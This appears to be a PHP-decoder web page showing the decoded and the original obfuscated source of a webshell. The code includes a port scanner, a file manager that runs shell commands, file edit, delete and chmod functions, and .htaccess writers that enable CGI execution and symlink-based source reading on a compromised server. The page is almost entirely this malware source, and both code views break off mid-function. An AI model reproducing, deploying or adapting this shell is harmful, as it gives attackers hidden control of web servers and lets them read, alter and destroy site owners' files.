Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function alfaget_flags() { $flags = array(); if (function_exists("\143\x75\162\x6c\x5f\..

Decoded Output download

<?  function alfaget_flags() { $flags = array();  
 if (function_exists("curl_version")) { $curl = new AlfaCURL();  
 $server_addr = !@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????" : @$_SERVER["SERVER_ADDR"];  
 $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr);  
 $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]);  
 if (strpos($flag2, "geoplugin") != false) { $flag = json_decode($flag, true);  
 $flag2 = json_decode($flag2, true);  
 if (!empty($flag["geoplugin_countryCode"])) { $flags["server"]["name"] = $flag["geoplugin_countryName"];  
 $flags["server"]["code"] = $flag["geoplugin_countryCode"];  
} if (!empty($flag2["geoplugin_countryCode"])) { $flags["client"]["name"] = $flag2["geoplugin_countryName"];  
 $flags["client"]["code"] = $flag2["geoplugin_countryCode"];  
} } } echo json_encode($flags);  
} goto mnD3M;  
 uvLJU: @ini_set("max_execution_time", 0);  
 goto UNg3p;  
 MFZAK: function alfaportscanner() { alfahead();  
 echo "<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>\xa<form action="" method="post" onsubmit="g('portscanner',null,null,this.start.value,this.end.value,this.host.value); return false;">\xa<input type="hidden" name="y" value="phptools">\xa<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>\xa<div class="txtfont">Port start: </div> <input id="text" size="5" type="text"  name="start" value="80"/>
<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
</form></center><br>";  
 $start = strip_tags($_POST["alfa2"]);  
 $end = strip_tags($_POST["alfa3"]);  
 $host = strip_tags($_POST["alfa4"]);  
 if (isset($_POST["alfa4"]) && is_numeric($_POST["alfa3"]) && is_numeric($_POST["alfa2"])) { echo __pre();  
 $packetContent = "GET / HTTP/1.1\xd

";  
 if (ctype_xdigit($packetContent)) { $packetContent = @pack("H*", $packetContent);  
} else { $packetContent = str_replace(array("
", "\xa"), '', $packetContent);  
 $packetContent = str_replace(array("\r", "\n"), array("\xd", "\xa"), $packetContent);  
} for ($i = $start;  
 $i <= $end;  
 $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3);  
 if ($sock) { stream_set_timeout($sock, 5);  
 fwrite($sock, $packetContent . "
\xd
\x0");  
 $counter = 0;  
 $maxtry = 1;  
 $bin = '';  
 do { $line = fgets($sock, 1024);  
 if (trim($line) == '') { $counter++;  
} $bin .= $line;  
} while ($counter < $maxtry);  
 fclose($sock);  
 echo "<center><p>Port <font style='color:#DE3E3E'>{$i}</font> is open</p>";  
 echo "<p><textarea style='height:140px;width:50%;'>" . $bin . "</textarea></p></center>";  
} flush();  
} } echo "</div>";  
 alfafooter();  
} goto DTcz6;  
 cCUoP: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $GLOBALS["sys"] = "win";  
} else { $GLOBALS["sys"] = "unix";  
} goto pQxMz;  
 DTcz6: function alfacgihtaccess($m, $d = '', $symname = false) { $readme = '';  
 if ($symname) { $readme = "
ReadmeName " . trim($symname);  
} if ($m == "cgi") { $code = "#Coded By Sole Sad & Invisible
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .alfa\xaAddHandler cgi-script .alfa";  
} elseif ($m == "sym") { $code = "#Coded By Sole Sad & Invisible
Options Indexes FollowSymLinks
DirectoryIndex solevisible.phtm\xaAddType text/plain php html php4 phtml\xaAddHandler text/plain php html php4 phtml{$readme}\xaOptions all";  
} elseif ($m == "shtml") { $code = "Options +Includes
AddType text/html .shtml\xaAddHandler server-parsed .shtml";  
} @__write_file($d . ".htaccess", $code);  
} goto NC1MJ;  
 DRRRb: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB";  
} elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB";  
} elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB";  
} else { return $s . " B";  
} } goto ku8Zo;  
 uDJAk: function alfaFilesTools() { alfahead();  
 echo "<div class="filestools" style="height: 100%;">";  
 if (isset($_POST["alfa1"])) { $_POST["alfa1"] = rawurldecode($_POST["alfa1"]);  
} $alfa1_decoded = $_POST["alfa1"];  
 $chdir_fals = false;  
 if (!@chdir($_POST["c"])) { $chdir_fals = true;  
 $_POST["alfa1"] = $_POST["c"] . "/" . $_POST["alfa1"];  
 $alfa_canruncmd = _alfa_can_runCommand(true, true);  
 if ($alfa_canruncmd) { $slashed_alfa1 = addslashes($_POST["alfa1"]);  
 $file_info = explode(":", alfaEx("stat -c "%F:%U:%G:%s:%Y:0%a:%A" "" . $slashed_alfa1 . """));  
 $perm_color_class = alfaEx("if [[ -w '" . $slashed_alfa1 . "' ]]; then echo main_green_perm; elif [[ -r '" . $slashed_alfa1 . "' ]]; then echo main_white_perm; else echo main_red_perm; fi");  
} } if ($_POST["alfa2"] == "auto") { if (is_array(@getimagesize($_POST["alfa1"]))) { $_POST["alfa2"] = "image";  
} else { $_POST["alfa2"] = "view";  
 if ($chdir_fals) { if ($alfa_canruncmd) { $mime = explode(":", alfaEx("file --mime-type '" . addslashes($_POST["alfa1"]) . "'"));  
 $mimetype = $mime[1];  
 if (!empty($mimetype)) { if (strstr($mimetype, "image")) { $_POST["alfa2"] = "image";  
} } } } } } if ($_POST["alfa2"] == "rename" && !empty($_POST["alfa3"]) && @is_writable($_POST["alfa1"])) { $rename_cache = $_POST["alfa3"];  
} if (@$_POST["alfa2"] == "mkfile") { $_POST["alfa1"] = trim($_POST["alfa1"]);  
 if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["c"])) { alfaEx("cd '" . addslashes($_POST["c"]) . "';touch '" . addslashes($alfa1_decoded) . "'");  
 $_POST["alfa2"] = "edit";  
} } if (!@file_exists($_POST["alfa1"])) { $fp = @fopen($_POST["alfa1"], "w");  
 if ($fp) { $_POST["alfa2"] = "edit";  
 fclose($fp);  
} } else { $_POST["alfa2"] = "edit";  
} } if (!_alfa_file_exists(@$_POST["alfa1"])) { echo __pre() . "<center><p><div class="txtfont"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('" . $_POST["alfa4"] . "');</script>";  
 alfaFooter();  
 return;  
} if ($chdir_fals) { $filesize = $file_info[3];  
 $uid["name"] = $file_info[1];  
 $gid["name"] = $file_info[2];  
 $permcolor = alfaPermsColor(array("class" => $perm_color_class, "num" => $file_info[5], "human" => $file_info[6]), true);  
} else { $uid = function_exists("posix_getpwuid") && function_exists("fileowner") ? @posix_getpwuid(@fileowner($_POST["alfa1"])) : '';  
 $gid = function_exists("posix_getgrgid") && function_exists("filegroup") ? @posix_getgrgid(@filegroup($_POST["alfa1"])) : '';  
 if (!$uid && !$gid) { $uid["name"] = function_exists("fileowner") ? @fileowner($_POST["alfa1"]) : '';  
 $gid["name"] = function_exists("filegroup") ? @filegroup($_POST["alfa1"]) : '';  
} $permcolor = alfaPermsColor($_POST["alfa1"]);  
 $filesize = @filesize($_POST["alfa1"]);  
 if (!isset($uid["name"], $gid["name"]) || empty($uid["name"]) || empty($gid["name"])) { if (_alfa_can_runCommand()) { list($uid["name"], $gid["name"]) = explode(":", alfaEx("stat -c "%U:%G" "" . addslashes($_POST["c"] . "/" . $_POST["alfa1"]) . """));  
} } } if (substr($_POST["alfa1"], 0, 7) == "phar://") { $alfa_file_directory = $_POST["alfa1"];  
} else { $alfa_file_directory = str_replace("//", "/", ($chdir_fals ? '' : $_POST["c"] . "/") . $_POST["alfa1"]);  
} echo "<div style="overflow: hidden;white-space: nowrap;text-overflow: ellipsis;"><span class="editor_file_info_vars">Name:</span> " . htmlspecialchars(basename($alfa1_decoded)) . " <span class="editor_file_info_vars">Size:</span> " . alfaSize($filesize) . " <span class="editor_file_info_vars">Permission:</span> " . $permcolor . " <span class="editor_file_info_vars">Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . " <span class="editor_file_info_vars">Directory:</span> " . dirname($alfa_file_directory) . "</div>";  
 if (empty($_POST["alfa2"])) { $_POST["alfa2"] = "view";  
} if (!_alfa_is_dir($_POST["alfa1"])) { $m = array("View", "Download", "Highlight", "Chmod", "Rename", "Touch", "Delete", "Image", "Hexdump");  
 $ftype = "file";  
} else { $m = array("Chmod", "Rename", "Touch");  
 $ftype = "dir";  
} echo "<div>";  
 foreach ($m as $v) { echo $v == "Delete" ? "<a href="javascript:void(0);" onclick="var chk=confirm('Are You Sure For Delete This File ?');chk?editor('" . addslashes(!isset($rename_cache) ? $_POST["alfa1"] : $rename_cache) . "','" . strtolower($v) . "','','" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "'):'';"><span class="editor_actions">" . (strtolower($v) == @$_POST["alfa2"] ? "<b><span class="editor_actions"> " . $v . " </span> </b>" : $v) . " | </span></a> " : "<a href="javascript:void(0);" onclick="editor('" . addslashes(!isset($rename_cache) ? $_POST["alfa1"] : $rename_cache) . "','" . strtolower($v) . "','','" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "')"><span class="editor_actions">" . (strtolower($v) == @$_POST["alfa2"] ? "<b><span class="editor_actions"> " . $v . " </span> </b>" : $v) . " | </span></a>";  
} echo "</div>";  
 switch ($_POST["alfa2"]) { case "view": case "edit": @chdir($_POST["c"]);  
 $disabled_btn = '';  
 if (!@is_writable($_POST["alfa1"]) && !_alfa_is_writable($_POST["alfa1"])) { $disabled_btn = "disabled=disabled";  
 $disabled_btn_style = "background: #ff0000;color: #fff;";  
} if (!empty($_POST["alfa3"])) { $_POST["alfa3"] = substr($_POST["alfa3"], 1);  
 $time = @filemtime($_POST["alfa1"]);  
 $fp = @__write_file($_POST["alfa1"], $_POST["alfa3"]);  
 if ($chdir_fals && $alfa_canruncmd) { $rname = $alfa1_decoded;  
 $randname = $rname . rand(111, 9999);  
 $filepath = dirname($_SERVER["SCRIPT_FILENAME"]) . "/" . $randname;  
 if ($fp = @__write_file($filepath, $_POST["alfa3"])) { alfaEx("mv '" . addslashes($filepath) . "' '" . addslashes($_POST["alfa1"]) . "';rm -f '" . addslashes($filepath) . "'");  
} } if ($fp) { echo "Saved!<br>";  
 @touch($_POST["alfa1"], $time, $time);  
} } echo "<div class="editor-view"><div class="view-content editor-ace-controller"><div style="display:inline-block;">" . _alfa_load_ace_options("editor") . "<button style="border-radius:10px;" class="button ace-controler" onClick="copyToClipboard(this);">Copy</button> <button class="button ace-controler" onclick="alfaAceToFullscreen(this);">Full Screen</button> <button onclick="var ace_val = alfa_ace_editors.editor[this.getAttribute('ace_id')].getValue();editor('" . addslashes($alfa1_decoded) . "','edit','1'+ace_val,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;" class="button ace-controler ace-save-btn" style="width: 100px;height: 33px;" . $disabled_btn_style . "" " . $disabled_btn . ">save</button></div><pre class="ml1 view_ml_content">";  
 echo htmlspecialchars(__read_file($_POST["alfa1"]));  
 echo "</pre></div></div>";  
 break;  
 case "highlight": @chdir($_POST["c"]);  
 if (@is_readable($_POST["alfa1"])) { echo "<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">";  
 $code = @highlight_file($_POST["alfa1"], true);  
 echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $code) . "</div></div></div>";  
} break;  
 case "delete": @chdir($_POST["c"]);  
 if (@is_writable($_POST["alfa1"]) || $GLOBALS["glob_chdir_false"]) { $deleted = true;  
 if (!@unlink($_POST["alfa1"])) { $deleted = false;  
 if ($alfa_canruncmd) { if (_alfa_is_writable($_POST["alfa1"])) { alfaEx("rm -f '" . addslashes($_POST["alfa1"]) . "'");  
 $deleted = true;  
} } } if ($deleted) { echo "File Deleted...<script>var elem = $("" . $_POST["alfa4"] . "").parentNode;elem.parentNode.removeChild(elem);delete editor_files["" . $_POST["alfa4"] . ""];</script>";  
} else { echo "Error...";  
} } break;  
 case "chmod": @chdir($_POST["c"]);  
 if (!empty($_POST["alfa3"])) { $perms = 0;  
 for ($i = strlen($_POST["alfa3"]) - 1;  
 $i >= 0;  
 --$i) { $perms += (int) $_POST["alfa3"][$i] * pow(8, strlen($_POST["alfa3"]) - $i - 1);  
} if (!@chmod($_POST["alfa1"], $perms)) { if ($chdir_fals && $alfa_canruncmd) { alfaEx("cd '" . addslashes($_POST["c"]) . "';chmod " . addslashes($_POST["alfa3"]) . " '" . addslashes($alfa1_decoded) . "'");  
 echo "Success!";  
} else { echo "<font color="#FFFFFF"><b>Can't set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>";  
} } else { echo "Success!";  
} } clearstatcache();  
 AlfaNum(8, 9, 10, 7, 6, 5, 4, 2, 1);  
 if ($chdir_fals) { $file_perm = $file_info[5];  
} else { $file_perm = substr(sprintf("%o", @fileperms($_POST["alfa1"])), -4);  
} echo "<script>alfa3_="";</script><form onsubmit="editor('" . addslashes($_POST["alfa1"]) . "','" . $_POST["alfa2"] . "',this.chmod.value,'" . $_POST["c"] . "','" . $_POST["alfa4"] . "','" . $ftype . "');return false;"><input type="text" name="chmod" value="" . $file_perm . ""><input type=submit value=" "></form>";  
 break;  
 case "hexdump": @chdir($_POST["c"]);  
 $c = __read_file($_POST["alfa1"]);  
 $n = 0;  
 $h = array("00000000<br>", '', '');  
 $len = strlen($c);  
 for ($i = 0;  
 $i < $len;  
 ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " ";  
 switch (ord($c[$i])) { case 0: $h[2] .= " ";  
 break;  ?>

Did this file decode correctly?

Original Code

function alfaget_flags() { $flags = array(); 
 if (function_exists("\143\x75\162\x6c\x5f\x76\x65\x72\x73\151\157\156")) { $curl = new AlfaCURL(); 
 $server_addr = !@$_SERVER["\123\105\122\x56\x45\x52\137\101\x44\104\x52"] ? function_exists("\147\x65\x74\150\x6f\x73\x74\142\x79\x6e\x61\155\x65") ? @gethostbyname($_SERVER["\x53\x45\x52\126\105\x52\x5f\x4e\x41\115\105"]) : "\x3f\x3f\x3f\x3f" : @$_SERVER["\123\x45\122\126\105\122\137\101\104\x44\122"]; 
 $flag = $curl->Send("\150\x74\x74\160\72\57\x2f\x77\x77\167\x2e\x67\x65\x6f\x70\x6c\x75\147\x69\156\x2e\x6e\x65\164\x2f\152\163\x6f\156\56\x67\160\77\151\x70\x3d" . $server_addr); 
 $flag2 = $curl->Send("\150\x74\164\x70\72\57\57\x77\x77\167\x2e\x67\x65\157\x70\x6c\165\x67\151\x6e\56\x6e\145\x74\x2f\152\x73\157\156\x2e\147\160\x3f\x69\160\x3d" . $_SERVER["\x52\105\x4d\117\124\x45\137\101\104\104\x52"]); 
 if (strpos($flag2, "\147\x65\157\x70\154\165\147\x69\156") != false) { $flag = json_decode($flag, true); 
 $flag2 = json_decode($flag2, true); 
 if (!empty($flag["\147\x65\x6f\x70\x6c\x75\x67\x69\156\x5f\143\x6f\165\x6e\164\x72\x79\x43\157\x64\145"])) { $flags["\163\x65\x72\166\x65\162"]["\x6e\x61\155\x65"] = $flag["\x67\x65\x6f\160\x6c\x75\x67\151\x6e\137\143\x6f\165\156\x74\x72\x79\116\x61\x6d\145"]; 
 $flags["\x73\145\x72\166\x65\162"]["\143\157\x64\x65"] = $flag["\147\x65\157\160\x6c\x75\147\x69\156\x5f\143\x6f\x75\x6e\x74\162\x79\x43\157\x64\145"]; 
} if (!empty($flag2["\x67\145\157\160\x6c\x75\x67\151\x6e\x5f\x63\x6f\165\156\164\x72\x79\103\157\144\145"])) { $flags["\x63\x6c\x69\x65\x6e\164"]["\156\x61\155\x65"] = $flag2["\147\145\157\x70\154\165\147\x69\x6e\x5f\143\x6f\165\x6e\164\162\171\116\141\x6d\145"]; 
 $flags["\x63\154\x69\145\x6e\x74"]["\143\157\144\x65"] = $flag2["\147\145\x6f\x70\x6c\x75\x67\x69\x6e\x5f\x63\157\x75\156\x74\162\171\103\x6f\144\x65"]; 
} } } echo json_encode($flags); 
} goto mnD3M; 
 uvLJU: @ini_set("\x6d\141\170\137\x65\x78\145\x63\165\164\151\x6f\x6e\137\164\151\155\145", 0); 
 goto UNg3p; 
 MFZAK: function alfaportscanner() { alfahead(); 
 echo "\74\x64\151\166\40\143\x6c\141\163\x73\75\x68\145\141\x64\x65\162\76\x3c\x63\145\x6e\x74\x65\x72\76\74\160\x3e\x3c\x64\151\166\x20\143\154\x61\163\x73\75\42\x74\170\x74\x66\x6f\156\x74\x5f\150\145\x61\144\x65\162\42\76\174\40\120\x6f\x72\164\x20\123\x63\x61\156\145\x72\40\174\x3c\x2f\x64\x69\x76\76\74\57\x70\76\xa\x3c\146\x6f\x72\155\40\x61\x63\164\x69\x6f\x6e\x3d\42\x22\x20\x6d\x65\x74\x68\157\x64\x3d\42\160\157\163\x74\x22\x20\157\156\163\165\142\155\151\164\x3d\x22\147\50\x27\160\x6f\x72\x74\x73\143\x61\x6e\156\x65\162\x27\54\x6e\x75\x6c\154\x2c\156\165\x6c\154\54\x74\x68\151\x73\x2e\x73\164\141\162\164\x2e\x76\141\x6c\165\x65\54\x74\150\151\x73\x2e\145\156\x64\x2e\x76\x61\154\165\145\x2c\x74\x68\x69\163\56\x68\x6f\163\x74\x2e\166\141\154\x75\x65\51\x3b\x20\x72\145\164\x75\162\x6e\40\146\141\154\163\x65\73\42\76\xa\x3c\x69\156\x70\x75\x74\x20\164\x79\x70\x65\x3d\42\150\151\144\x64\145\x6e\x22\40\x6e\141\x6d\x65\75\x22\171\x22\x20\x76\x61\154\x75\x65\x3d\x22\x70\x68\160\164\x6f\x6f\x6c\x73\42\x3e\xa\x3c\x64\151\166\x20\143\154\141\x73\163\75\42\x74\x78\164\146\x6f\156\164\x22\x3e\110\x6f\x73\164\x3a\40\74\57\x64\151\x76\x3e\40\74\151\x6e\x70\x75\164\40\x69\x64\x3d\42\x74\145\170\x74\42\40\x74\x79\160\145\75\x22\x74\145\170\164\x22\x20\156\x61\x6d\x65\75\x22\150\157\x73\164\x22\x20\166\141\x6c\165\x65\75\42\x6c\x6f\x63\x61\x6c\150\x6f\163\x74\42\x2f\76\xa\74\144\151\x76\x20\x63\154\141\163\163\75\42\x74\x78\164\146\157\156\x74\x22\x3e\x50\x6f\162\164\40\x73\x74\x61\162\x74\x3a\40\74\57\144\x69\x76\76\x20\74\x69\x6e\160\x75\x74\40\151\x64\75\x22\164\x65\170\x74\42\x20\x73\151\x7a\145\75\x22\x35\x22\x20\x74\171\160\145\75\42\x74\145\170\164\42\40\x20\x6e\141\x6d\x65\75\42\163\x74\141\162\x74\x22\40\x76\141\x6c\x75\145\75\42\x38\x30\x22\57\76\12\74\144\151\166\x20\143\x6c\x61\x73\163\75\42\x74\x78\x74\146\157\x6e\164\x22\76\x50\x6f\162\x74\x20\x65\156\144\72\x20\74\57\x64\151\x76\x3e\x20\74\x69\x6e\x70\x75\164\40\x69\x64\75\x22\164\145\x78\x74\x22\x20\163\x69\x7a\x65\75\42\x35\42\x20\x74\171\160\x65\75\x22\x74\145\170\164\x22\40\156\x61\155\145\75\42\145\156\144\42\x20\x76\x61\154\x75\145\x3d\x22\70\x30\x22\57\x3e\x20\74\151\x6e\160\x75\164\40\164\x79\160\145\75\42\163\x75\142\x6d\151\164\x22\x20\166\141\154\x75\145\75\42\40\x22\x20\57\76\12\74\57\146\157\162\x6d\x3e\74\57\143\x65\156\164\x65\x72\76\74\142\x72\x3e"; 
 $start = strip_tags($_POST["\141\154\146\141\x32"]); 
 $end = strip_tags($_POST["\x61\x6c\x66\141\x33"]); 
 $host = strip_tags($_POST["\141\154\146\141\64"]); 
 if (isset($_POST["\x61\154\x66\141\x34"]) && is_numeric($_POST["\x61\154\x66\141\63"]) && is_numeric($_POST["\141\154\146\x61\x32"])) { echo __pre(); 
 $packetContent = "\x47\105\x54\x20\57\40\x48\124\124\120\x2f\x31\x2e\61\xd\12\15\12"; 
 if (ctype_xdigit($packetContent)) { $packetContent = @pack("\x48\52", $packetContent); 
} else { $packetContent = str_replace(array("\15", "\xa"), '', $packetContent); 
 $packetContent = str_replace(array("\x5c\x72", "\134\156"), array("\xd", "\xa"), $packetContent); 
} for ($i = $start; 
 $i <= $end; 
 $i++) { $sock = @fsockopen($host, $i, $errno, $errstr, 3); 
 if ($sock) { stream_set_timeout($sock, 5); 
 fwrite($sock, $packetContent . "\15\12\xd\12\x0"); 
 $counter = 0; 
 $maxtry = 1; 
 $bin = ''; 
 do { $line = fgets($sock, 1024); 
 if (trim($line) == '') { $counter++; 
} $bin .= $line; 
} while ($counter < $maxtry); 
 fclose($sock); 
 echo "\74\x63\145\156\164\x65\x72\x3e\x3c\160\76\x50\x6f\x72\x74\x20\74\146\x6f\x6e\164\40\x73\x74\x79\x6c\145\75\47\143\157\x6c\157\x72\x3a\43\104\x45\63\x45\x33\105\47\76{$i}\74\x2f\146\x6f\x6e\x74\x3e\x20\x69\163\x20\x6f\x70\145\x6e\74\57\x70\76"; 
 echo "\x3c\x70\76\74\164\x65\x78\164\141\x72\145\x61\40\163\164\x79\x6c\x65\x3d\47\x68\145\151\147\x68\164\x3a\61\64\60\x70\x78\x3b\x77\x69\x64\164\x68\x3a\x35\60\45\73\47\x3e" . $bin . "\74\x2f\164\x65\170\164\141\x72\x65\x61\x3e\74\57\x70\76\x3c\x2f\143\x65\156\164\x65\x72\x3e"; 
} flush(); 
} } echo "\74\x2f\x64\x69\166\76"; 
 alfafooter(); 
} goto DTcz6; 
 cCUoP: if (strtolower(substr(PHP_OS, 0, 3)) == "\167\151\x6e") { $GLOBALS["\163\171\x73"] = "\x77\151\x6e"; 
} else { $GLOBALS["\x73\171\x73"] = "\165\x6e\x69\x78"; 
} goto pQxMz; 
 DTcz6: function alfacgihtaccess($m, $d = '', $symname = false) { $readme = ''; 
 if ($symname) { $readme = "\12\122\x65\141\x64\x6d\145\116\x61\155\145\40" . trim($symname); 
} if ($m == "\x63\147\x69") { $code = "\x23\103\157\144\145\144\x20\102\x79\40\123\157\154\145\x20\123\x61\x64\x20\x26\x20\x49\x6e\x76\151\163\x69\142\x6c\145\12\x4f\x70\164\151\x6f\156\163\40\x46\x6f\154\154\x6f\x77\x53\x79\155\x4c\x69\x6e\x6b\x73\40\115\165\154\x74\x69\x56\x69\145\167\163\40\x49\x6e\x64\145\170\x65\x73\x20\x45\170\145\x63\x43\107\111\12\101\x64\x64\124\171\160\145\x20\141\160\x70\154\151\x63\141\x74\x69\157\x6e\x2f\170\55\150\164\164\160\144\55\143\x67\151\x20\x2e\x61\x6c\146\x61\xa\101\144\144\110\141\156\x64\154\x65\x72\40\x63\147\151\55\163\x63\162\x69\160\x74\40\56\141\x6c\x66\141"; 
} elseif ($m == "\x73\171\x6d") { $code = "\43\103\x6f\x64\145\144\x20\x42\171\x20\x53\157\x6c\145\x20\x53\141\x64\40\x26\x20\x49\156\166\151\x73\x69\x62\x6c\x65\12\x4f\x70\x74\x69\x6f\x6e\x73\40\111\156\x64\x65\x78\145\x73\x20\x46\x6f\154\x6c\157\167\x53\171\155\114\x69\x6e\x6b\163\12\x44\x69\x72\145\x63\164\x6f\x72\171\111\156\x64\145\170\x20\x73\157\154\145\x76\x69\x73\151\142\x6c\x65\x2e\160\x68\164\155\xa\101\x64\144\124\x79\x70\145\40\164\x65\x78\164\57\160\x6c\141\151\x6e\40\x70\x68\160\40\150\x74\155\x6c\40\160\150\x70\x34\x20\160\150\164\x6d\154\xa\x41\144\x64\110\x61\x6e\x64\x6c\145\162\40\164\x65\x78\x74\x2f\x70\154\141\x69\x6e\40\x70\150\x70\x20\x68\164\x6d\x6c\x20\x70\150\x70\x34\40\160\x68\x74\x6d\154{$readme}\xa\x4f\160\x74\151\x6f\156\x73\x20\x61\154\154"; 
} elseif ($m == "\163\x68\164\155\154") { $code = "\x4f\x70\x74\151\x6f\x6e\x73\x20\53\x49\x6e\143\154\x75\x64\x65\163\12\101\144\144\x54\x79\160\x65\x20\164\x65\170\164\x2f\x68\164\x6d\x6c\x20\56\x73\x68\x74\x6d\x6c\xa\101\144\144\110\141\156\x64\154\145\162\40\163\x65\162\166\x65\x72\55\160\x61\162\163\x65\x64\x20\56\x73\150\164\x6d\x6c"; 
} @__write_file($d . "\x2e\150\x74\x61\143\x63\145\x73\x73", $code); 
} goto NC1MJ; 
 DRRRb: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("\45\x31\x2e\x32\146", $s / 1073741824) . "\40\107\x42"; 
} elseif ($s >= 1048576) { return sprintf("\45\61\56\x32\146", $s / 1048576) . "\x20\x4d\x42"; 
} elseif ($s >= 1024) { return sprintf("\45\61\56\x32\146", $s / 1024) . "\x20\113\102"; 
} else { return $s . "\40\102"; 
} } goto ku8Zo; 
 uDJAk: function alfaFilesTools() { alfahead(); 
 echo "\x3c\144\151\x76\x20\x63\154\x61\x73\x73\75\42\x66\x69\x6c\145\x73\164\x6f\x6f\x6c\x73\x22\40\163\x74\x79\154\145\75\42\x68\145\151\x67\150\164\72\x20\61\x30\x30\45\x3b\x22\x3e"; 
 if (isset($_POST["\x61\154\x66\141\x31"])) { $_POST["\x61\154\146\x61\x31"] = rawurldecode($_POST["\141\x6c\x66\141\61"]); 
} $alfa1_decoded = $_POST["\141\154\146\x61\x31"]; 
 $chdir_fals = false; 
 if (!@chdir($_POST["\x63"])) { $chdir_fals = true; 
 $_POST["\141\x6c\x66\141\61"] = $_POST["\x63"] . "\x2f" . $_POST["\x61\x6c\x66\141\x31"]; 
 $alfa_canruncmd = _alfa_can_runCommand(true, true); 
 if ($alfa_canruncmd) { $slashed_alfa1 = addslashes($_POST["\x61\x6c\146\141\61"]); 
 $file_info = explode("\72", alfaEx("\163\164\x61\x74\40\55\143\x20\42\x25\106\72\45\x55\72\x25\107\72\x25\163\x3a\x25\131\x3a\60\x25\141\x3a\45\x41\42\x20\42" . $slashed_alfa1 . "\42")); 
 $perm_color_class = alfaEx("\x69\146\40\133\x5b\x20\x2d\x77\40\47" . $slashed_alfa1 . "\47\40\x5d\x5d\x3b\40\164\x68\x65\x6e\x20\145\143\150\x6f\40\x6d\x61\151\x6e\137\147\x72\145\x65\156\x5f\x70\x65\x72\x6d\73\x20\145\x6c\x69\146\40\x5b\x5b\40\x2d\x72\40\x27" . $slashed_alfa1 . "\47\x20\135\135\x3b\x20\x74\150\145\x6e\40\x65\x63\x68\157\40\x6d\x61\x69\156\x5f\167\x68\x69\164\145\137\x70\145\x72\x6d\73\40\x65\x6c\x73\145\40\x65\143\x68\157\40\155\x61\151\156\137\162\x65\144\x5f\160\x65\162\155\x3b\40\146\x69"); 
} } if ($_POST["\141\x6c\x66\x61\x32"] == "\x61\165\164\x6f") { if (is_array(@getimagesize($_POST["\141\154\x66\x61\x31"]))) { $_POST["\x61\x6c\x66\x61\x32"] = "\x69\x6d\x61\147\145"; 
} else { $_POST["\x61\x6c\146\x61\62"] = "\166\x69\145\x77"; 
 if ($chdir_fals) { if ($alfa_canruncmd) { $mime = explode("\72", alfaEx("\x66\x69\x6c\x65\x20\x2d\x2d\x6d\x69\x6d\145\x2d\164\171\160\x65\40\47" . addslashes($_POST["\141\154\x66\x61\x31"]) . "\x27")); 
 $mimetype = $mime[1]; 
 if (!empty($mimetype)) { if (strstr($mimetype, "\x69\x6d\141\147\x65")) { $_POST["\141\154\x66\141\x32"] = "\151\155\141\147\145"; 
} } } } } } if ($_POST["\x61\x6c\146\141\62"] == "\162\145\156\x61\155\x65" && !empty($_POST["\x61\154\146\x61\x33"]) && @is_writable($_POST["\141\154\x66\x61\x31"])) { $rename_cache = $_POST["\x61\x6c\x66\x61\63"]; 
} if (@$_POST["\141\154\x66\x61\x32"] == "\x6d\153\x66\x69\154\145") { $_POST["\x61\x6c\x66\141\x31"] = trim($_POST["\x61\x6c\146\141\x31"]); 
 if ($chdir_fals && $alfa_canruncmd) { if (_alfa_is_writable($_POST["\143"])) { alfaEx("\143\144\x20\47" . addslashes($_POST["\143"]) . "\x27\x3b\164\157\165\143\x68\40\47" . addslashes($alfa1_decoded) . "\47"); 
 $_POST["\141\x6c\x66\x61\x32"] = "\x65\144\151\164"; 
} } if (!@file_exists($_POST["\141\x6c\x66\x61\x31"])) { $fp = @fopen($_POST["\141\154\146\141\61"], "\x77"); 
 if ($fp) { $_POST["\x61\x6c\146\141\62"] = "\145\x64\x69\x74"; 
 fclose($fp); 
} } else { $_POST["\x61\x6c\x66\x61\62"] = "\x65\x64\x69\x74"; 
} } if (!_alfa_file_exists(@$_POST["\141\x6c\x66\141\61"])) { echo __pre() . "\x3c\x63\x65\x6e\164\145\162\76\x3c\x70\x3e\74\x64\151\x76\x20\143\x6c\141\x73\163\75\x22\x74\x78\x74\146\x6f\156\x74\x22\76\74\146\x6f\156\164\x20\143\157\x6c\x6f\162\x3d\x27\162\145\144\47\x3e\x21\56\56\56\x46\111\114\105\x20\x44\117\105\123\x54\x20\116\117\x54\40\105\x58\x49\124\123\x2e\x2e\x2e\41\x3c\57\146\x6f\x6e\164\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\57\x70\76\x3c\x2f\143\145\x6e\x74\145\162\x3e\x3c\57\x64\151\x76\76\74\163\x63\x72\151\x70\x74\76\x65\x64\x69\164\157\x72\x5f\145\x72\162\157\162\x3d\x66\x61\154\163\145\x3b\162\145\x6d\x6f\166\x65\110\x69\163\x74\157\162\171\x28\47" . $_POST["\x61\x6c\146\141\64"] . "\47\x29\73\74\x2f\163\x63\x72\151\x70\x74\76"; 
